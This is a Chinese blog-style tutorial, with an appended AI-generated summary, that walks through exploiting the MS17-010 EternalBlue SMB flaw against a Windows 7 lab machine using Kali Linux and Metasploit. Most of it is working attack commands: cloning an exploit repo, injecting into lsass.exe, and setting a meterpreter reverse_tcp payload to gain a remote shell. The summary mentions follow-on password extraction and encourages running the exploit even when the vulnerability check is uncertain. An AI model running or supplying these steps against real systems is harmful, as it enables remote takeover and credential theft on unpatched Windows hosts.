smb(ms17-010)远程命令执行之msf

本文介绍如何使用Kali Linux和Metasploit框架利用MS17-010漏洞攻击Windows 7系统。步骤包括安装必要的工具、配置Metasploit模块并成功获取Meterpreter会话。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本次用到的环境:

kali(2016.2)32位系统.ip地址:192.168.1.104

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

具体的步骤如下:

kali系统下安装wine32:

apt-get install wine32 

 

 

用wine32执行cmd.exe

wine cmd.exe

 

exit        //退出

 

 git  clone下载其利用脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

 

启动msf,然后进行一系列设置:

service postgresql start
msfconsole

 

 

search  eternalblue
use exploit
/windows/smb/eternalblue_doublepulsar

 

复制代码
 set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

  set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT   lsass.exe

set TARGETARCHITECTURE  x64

set rhost  192.168.1.105

show targets

set target 9

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.1.104

exploit
复制代码

 

 

附录:

msf下的ms17-010模块:

前提条件:

1. gem install ruby_smb #ruby_smb模块安装

2.msfupdate   #msf的更新

3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

 

复制代码
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

Meterpreter> sysinfo
复制代码

 

 

 

 

 

 

### 使用 Metasploit 执行 MS17-010 漏洞利用 #### 加载 EternalBlue Exploit 模块 为了针对 MS17-010 漏洞进行攻击或测试,在 Metasploit 中加载特定的 SMB 漏洞利用模块: ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue ``` 这一步骤选择了用于 Windows SMB 服务中的 MS17-010 漏洞——即著名的“永恒之蓝”漏洞的攻击向量[^1]。 #### 设置目标和配置 Payload 一旦选定模块之后,设置目标机器的相关参数以及选择有效负载(Payload),默认情况下会选择 `windows/x64/meterpreter/reverse_tcp` 这种反向 TCP Meterpreter shell 类型的有效荷载: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target_ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <local_ip> ``` 这里 `<target_ip>` 是指代存在潜在漏洞的目标主机 IP 地址,而 `<local_ip>` 则是指本地监听地址以便接收来自受害者的连接请求[^3]。 #### 验证并运行 Exploit 完成上述准备工作后,可以通过命令来检查当前设定是否合理,并最终执行实际攻击操作: ```bash msf6 exploit(windows/smb/ms17_010_etternalblue) > check msf6 exploit(windows/smb/ms17_010_eternalblue) > run ``` 需要注意的是,“check” 功能并非总是能够准确判断远程系统的脆弱性状态;因此即使返回不确定的结果也值得一试 “run”。 #### 后渗透阶段 如果成功突破,则会获得一个交互式的 Meterpreter Shell 或者其他形式的访问权限。此时可以根据具体需求进一步开展后续行动,比如文件系统浏览、密码提取等高级功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值